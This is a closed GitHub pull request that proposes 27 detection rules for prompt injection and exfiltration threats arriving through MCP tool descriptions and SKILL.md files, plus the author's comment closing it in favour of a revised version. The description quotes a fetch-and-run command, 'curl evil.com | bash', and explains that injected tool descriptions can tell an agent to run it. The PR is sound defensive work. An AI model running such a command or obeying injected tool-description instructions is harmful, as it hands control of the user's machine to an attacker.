Skip to content

threats: add agent-protocol.yaml (27 rules)#32

Closed
Adamthereal (eeee2345) wants to merge 1 commit intogendigitalinc:pre-releasefrom
eeee2345:atr-agent-protocol-rules
Closed

threats: add agent-protocol.yaml (27 rules)#32
Adamthereal (eeee2345) wants to merge 1 commit intogendigitalinc:pre-releasefrom
eeee2345:atr-agent-protocol-rules

Conversation

@eeee2345
Copy link
Copy Markdown

Closes part of #30.

Adds threats/agent-protocol.yaml — 27 detection rules for agent-protocol-layer threats that arrive via MCP tool descriptions and SKILL.md files, before they become OS commands.

The gap these fill: Sage catches curl evil.com | bash at the command layer. These rules catch the MCP tool description that instructs the agent to run that command, earlier in the kill chain.

All 27 rules use match_on: content, compatible with the existing matcher. Zero overlap with current commands.yaml / files.yaml / credentials.yaml.

Categories

  • 8× prompt injection (AGT-PI-001..008)
  • 8× MCP-specific (AGT-MCP-001..008)
  • 4× SKILL.md-specific (AGT-SKL-001..004)
  • 3× supply chain (AGT-SUP-001..003)
  • 4× agent-context exfiltration (AGT-EXF-001..004)

File header declares MIT per Vaclav Belak (@vaclavbelak)'s approval in #30.

Rules are derived from ATR's benchmark suite — methodology at https://github.com/Agent-Threat-Rule/agent-threat-rules#evaluation

If this lands cleanly I'll submit follow-ups for the remaining ATR categories (86 rules) batched by subcategory.

Closes part of gendigitalinc#30.

Adds threats/agent-protocol.yaml — 27 detection rules for agent-protocol
-layer threats that arrive via MCP tool descriptions and SKILL.md files,
before they become OS commands.

The gap these fill: Sage catches 'curl evil.com | bash' at the command
layer. These rules catch the MCP tool description that *instructs the
agent to run* that command, earlier in the kill chain.

All 27 rules use match_on: content, compatible with the existing matcher.
Zero overlap with current commands.yaml / files.yaml / credentials.yaml.

Categories:
- 8x prompt injection (AGT-PI-001..008)
- 8x MCP-specific (AGT-MCP-001..008)
- 4x SKILL.md-specific (AGT-SKL-001..004)
- 3x supply chain (AGT-SUP-001..003)
- 4x agent-context exfiltration (AGT-EXF-001..004)

File header declares MIT per @vaclavbelak's approval in gendigitalinc#30.

Rules are derived from ATR's benchmark suite — methodology at
https://github.com/Agent-Threat-Rule/agent-threat-rules#evaluation

If this lands cleanly I'll submit follow-ups for the remaining ATR
categories (86 rules) batched by subcategory.
@eeee2345
Copy link
Copy Markdown
Author

Closing in favor of #33, which supersedes this PR.

Why

This PR (#32) used an AGT-* ID prefix and skipped Sage's ID convention. It also went out before the rules were run against Sage's actual packages/core/loadThreats engine or benchmarked against a real-world benign corpus — so two rules here turn out to overlap with existing credentials.yaml / commands.yaml coverage, and the regexes were not validated against ReDoS / JS-RegExp compilation quirks.

What #33 does differently

  • Uses the CLT-* prefix convention from your existing threat files (CLT-PI, CLT-MCP, CLT-SKL, CLT-CTX).
  • Audited against every existing threats/*.yaml — zero overlap with current 313 rules.
  • Loaded through loadThreats() — 17/17 rules compile in Sage's RegExp (no (?i) inline flags, no unsupported Unicode escapes).
  • Zero false positives on a 432-sample real-world benign skill corpus.
  • All 1521 Sage tests still pass; lint + build + changeset clean.
  • Scope tightened from 27 → 17 high-confidence rules (the lower-confidence ones will come in a follow-up if this lands well).

Please route review to #33. Apologies for the duplicate — this was an artifact of an earlier iteration that shipped before the proper validation loop.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

None yet

Projects

None yet

Development

Successfully merging this pull request may close these issues.

1 participant